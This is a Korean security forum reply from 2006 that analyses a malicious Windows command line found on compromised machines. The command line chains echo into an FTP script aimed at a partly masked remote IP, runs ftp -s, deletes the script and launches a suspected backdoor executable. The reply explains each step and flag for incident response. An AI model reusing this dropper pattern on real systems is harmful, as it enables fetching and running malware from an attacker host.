크래킹 피해

423,

9/22

pr0sp3r

http://lastlog.com

[re] rootkit에 관한 질문입니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=226 [복사]

해당 코드는

cmd /k
echo open x.x.136.76 23825 > o &
echo user 1 1              >> o &
echo quit                  >> o &
ftp -n -s:o &
del /F /Q o &
axdcfasb.exe

위와 같은 형태로 이루어 지며

> 리다이렉트(표준출력),
>> 리다이렉트(표준출력 추가)
& 문자열 접속자

cmd.exe의 파라메터를 통한 의도한 작업을 batch 파일로 ftp 주소와
유저명/패스워드 명을 파일로 저장시킨 후
만들어진 o 파일의 정보를 이용하여 ftp 접속하고,
만들어진 파일을 지운뒤
axdcfasb.exe( 아마도 백도어로 의심됨) 를 실행하도록 되어있네요.

유사하게 파일을 만들면..
-------------------------------------------------------------------------------
C:\DOCUME~1\ADMINI~1>cmd /k echo open 1.1.1.1>test.txt&echo user 1 1>>test.txt&
echo quit>>test.txt

exit

C:\DOCUME~1\ADMINI~1>type test.txt
open 1.1.1.1

C:\DOCUME~1\ADMINI~1>C:\DOCUME~1\ADMINI~1>user 1
quit
--------------------------------------------------------------------------------

위에서 사용된 프로그램의 파라메터 설명입니다.

Windows2000 명령 인터프리터의 새 인스턴스를 시작합니다.
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] 문자열]

/K      문자열이 지정한 명령어를 수행한 후에 계속 남아있습니다.
===============================================================================

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
-n             Suppresses auto-login upon initial connection.
-s:filename    Specifies a text file containing FTP commands; the
               commands will automatically run after FTP starts.
===============================================================================
DEL [/P] [/F] [/S] [/Q] [/A[[:]특성]] 이름
/F            읽기 전용 파일을 강제로 삭제합니다.
/Q            조용한 모드, 글로벌 와일드 카드에서 삭제해도 묻지 않습니다.
===============================================================================

>다수의 스팸릴레이 혹은 스캐닝 툴에 동작하는 컴퓨터들에
>proceexpolore 로 확인해본 결과 아래와 같은 동작이 수행중임을 알 수 있었습니다.
>
>중간에 삽입된 o&는 어떤 역활을 하는지.. 아래 코드에 대한 상세한 분석을 도와주시기 바랍니다.. 감사합니다..
>
>cmd /k echo open x.x.136.76 23825 > o&echo user 1 1 >> o &echo quti >> o &ftp -n -s:o &del /F /Q o &axdcfasb.exe
>
>매번 고맙습니다...
===============================================================================

Hit : 3805 Date : 2006/07/07 02:38